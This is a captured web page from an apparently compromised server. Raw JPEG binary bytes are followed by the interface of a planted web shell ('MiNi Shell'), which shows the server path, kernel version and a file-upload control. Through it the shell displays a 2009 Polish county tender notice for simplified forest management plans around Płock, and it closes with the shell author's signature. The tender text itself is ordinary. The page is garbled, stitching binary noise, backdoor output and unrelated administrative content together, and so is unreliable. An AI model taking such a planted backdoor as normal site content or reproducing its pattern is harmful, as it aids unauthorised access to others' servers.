JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090408/97084-N-2009.html

<p class="kh_header"><b>Płock: Sporządzenie uproszczonych planów urządzenia lasów dla lasów nie stanowiących własności Skarbu Państwa, należących do osób fizycznych i wspólnot gruntowych o łącznej powierzchni nie przekraczającej 2 500 ha, położonych na terenach 10 gmin powiatu płockiego, tj.: Bielsk, Bodzanów, Brudzeń Duży, Bulkowo, Drobin, Mała Wieś, Radzanowo, Słupno, Stara Biała i Wyszogród</b><br>
<b>Numer ogłoszenia: 97084 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Płocku , ul. Bielska 59, 09-400 Płock, woj. mazowieckie, tel. 024 2676777, faks 024 2676848.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie uproszczonych planów urządzenia lasów dla lasów nie stanowiących własności Skarbu Państwa, należących do osób fizycznych i wspólnot gruntowych o łącznej powierzchni nie przekraczającej 2 500 ha, położonych na terenach 10 gmin powiatu płockiego, tj.: Bielsk, Bodzanów, Brudzeń Duży, Bulkowo, Drobin, Mała Wieś, Radzanowo, Słupno, Stara Biała i Wyszogród.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach realizacji zadania Wykonawca:
1) we własnym zakresie i na własny koszt pozyska z Ośrodka Dokumentacji 
   Geodezyjno-Kartograficznej przy Starostwie Powiatowym w Płocku Ewidencja 
   Gruntów i Budynków - wypisy z rejestru gruntów oraz mapy ewidencyjne obrębów obejmujące działki leśne objęte pracami urządzeniowymi,
2) sporządzi uproszczone plany urządzenia lasów, w tym zaktualizuje powierzchnie 
    lasów, zgodnie z:
a) ustawą z dnia 28 września 1991 r. o lasach (j.t. Dz. U. z 2005 r. Nr 45, poz. 435 
     z późn. zm.), 
b) rozporządzeniem Ministra Środowiska z dnia 20 grudnia 2005 r. w sprawie 
     szczegółowych warunków i trybu sporządzania planu urządzenia lasu, 
    uproszczonego planu urządzenia lasu oraz inwentaryzacji stanu lasu (Dz. U. Nr 
    256, poz. 2151), 
3) w pracach taksacyjnych uwzględni:
a) grunty ujęte w rejestrze ewidencji gruntów i budynków jako lasy (Ls), 
b) grunty zalesione nie ujęte w rejestrze ewidencji gruntów i budynków jako lasy (Ls),
c) grunty pokryte roślinnością o charakterze leśnym (samosiewy), nie ujęte 
     w ewidencji gruntów jako lasy, a spełniające kryteria definicji lasu określonej 
     w art. 3 ustawy o lasach,
4) w przypadku stwierdzenia rozbieżności pomiędzy stanem faktycznym na gruncie 
     a ewidencją gruntów sporządzi wykaz tych powierzchni, z uwzględnieniem 
     danych osobowych i adresu zamieszkania właściciela działki oraz nr ewid. działki,
5) uproszczone plany urządzenia lasów wykona  w sposób zapewniający trwałość 
     wydruku (aby druk nie rozmazywał się po zamoknięciu), 
6) mapy gospodarcze wykona w 3 egzemplarzach  na podkładach map ewidencyjnych, 
    pokolorowane według gatunków głównych. Grunty zalesione i samosiewy wyróżni 
    dodatkowo poprzez zakreskowanie. Po jednym egzemplarzu mapy dołączy 
    do każdego egzemplarza opracowania, umieszczając je w kieszeni (kopercie) na 
    końcu każdego planu, 
7) o wykonaniu projektów planów dla poszczególnych obrębów ewidencyjnych 
    w danej gminie powiadomi pisemnie Zamawiającego i właściwego wójta/burmistrza 
    gminy oraz wyłoży projekty planów do publicznego wglądu na okres 60 dni 
    w siedzibie właściwego urzędu gminy. Po 1 egzemplarzu projektów uproszczonych 
    planów urządzenia lasów przedłoży także Zamawiającemu - celem ich przeglądu, 
    wniesienia ewentualnych uwag oraz wykorzystania na spotkaniach gminnych 
    z właścicielami lasów; weźmie udział w tych spotkaniach,
8) przyjmie w terminie 30 dni od daty wyłożenia projektów planów ewentualne 
     zastrzeżenia i wnioski zainteresowanych właścicieli lasów dotyczące projektów 
     planów, kwalifikując je na te, które można od razu rozpatrzyć oraz te, które należy przekazać Staroście Płockiemu celem wydania decyzji  w sprawie uznania lub nie uznania zastrzeżeń i wniosków,
9) skoryguje projekty planów, w odniesieniu do których Starosta Płocki uwzględnił 
      zastrzeżenia i wnioski oraz w zakresie stwierdzonym przez Zamawiającego, także w przypadku, gdy postępowanie w sprawie uznania lub nie uznania zastrzeżeń i wniosków zostanie zakończone po upływie terminu wykonania zadania, 
10) uzyska opinie dotyczące projektów uproszczonych planów urządzenia lasów od 
       Nadleśniczego Nadleśnictwa Płock,
11) przekaże Staroście Płockiemu uproszczone plany urządzenia lasów:
 a) w wersji papierowej, w twardej oprawie introligatorskiej z nazwą obrębu 
     ewidencyjnego na grzbiecie okładki, obejmujące poszczególne obręby - 
     w 3 egzemplarzach,
 b) w wersji elektronicznej w formacie pdf na płytach CD lub DVD, obejmujące 
     poszczególne gminy - w 2 egzemplarzach,
 c) w wersji papierowej - karty zadań dla poszczególnych właścicieli lasów pn.: 
     Zadania w zakresie gospodarki leśnej - po 1 egzemplarzu.

Egzemplarze w wersji papierowej (w tym mapy gospodarcze) podpisze 
i opieczętuje..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.23.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3348 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do przetargu mogą przystąpić Wykonawcy, którzy spełniają niżej wymienione warunki, tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
     jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego i osób zdolnych do wykonania zamówienia,

3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
      zamówienia,

4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
     podstawie art. 22 ust. 1 pkt 4 w związku z art. 24 ust. 1 i 2 ustawy z dnia       
     29 stycznia 2004 r. Prawo zamówień publicznych,

5) wykonali w okresie ostatnich 3 lat minimum 2 prace odpowiadające swoim 
 rodzajem i wartością pracom objętym przedmiotem zamówienia, a jeżeli     
 okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem 
 ich wartości, przedmiotu zamówienia, dat wykonania i odbiorców oraz     
 załączenia dokumentów potwierdzających należyte ich wykonanie 
 wg załącznika nr 4 do niniejszej specyfikacji).

6) wniosą wadium zgodnie z opisem podanym w pkt 6, 

7) spełnią pozostałe warunki specyfikacji (w tym złożą ofertę zgodnie z treścią specyfikacji).
    
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się do przepisów § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakie może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.
Zamawiający oceni spełnienie warunków w zależności od złożonych dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.
Niespełnienie warunków będzie stanowiło podstawę do wykluczenia Wykonawcy i odrzucenia jego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty:
1) oryginał dokumentu wadialnego lub kserokopię przelewu potwierdzającego 
       wniesienie wadium, 
2) wypełniony i podpisany formularz oferty (wg załącznika nr 2 do niniejszej 
    specyfikacji),
3) oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1               
    oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia na 
    podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych 
   (wg załącznika nr 3 do niniejszej specyfikacji),
4) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
    do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, 
    wystawione nie wcześniej niż 6 miesięcy przed upływem terminu 
    składania ofert,
5) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne, społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków  o dopuszczenie udziału w postępowaniu o udzielenie zamówienia albo składania ofert lub oświadczenie oferenta, 
6) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania,
7) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert,
8) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert,
9) wykaz wykonanych w okresie ostatnich 3 lat prac odpowiadających swoim 
    rodzajem i wartością pracom objętym przedmiotem zamówienia, a jeżeli 
    okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich 
    wartości, przedmiotu zamówienia, dat wykonania i odbiorców oraz załączenia 
    dokumentów potwierdzających należyte ich wykonanie - minimum 2 prace 
    (wg załącznika nr 4 do niniejszej specyfikacji),
10) harmonogram rzeczowo-finansowy przedmiotu zamówienia obejmujący zakres 
       prac, ich wartość oraz termin realizacji (wg załącznika nr 5 do niniejszej 
       specyfikacji)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://powiatplocki.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Płocku, ul. Bielska 59 09-400 Płock.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 11:45, miejsce: Kancelaria Ogólnej, pokój nr 212 pon. - pt. w godz. od 8:00-15:00 lub za pośrednictwem poczty na adres: Starostwo Powiatowe 
      w Płocku, ul. Bielska 59, 09-400 Płock..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com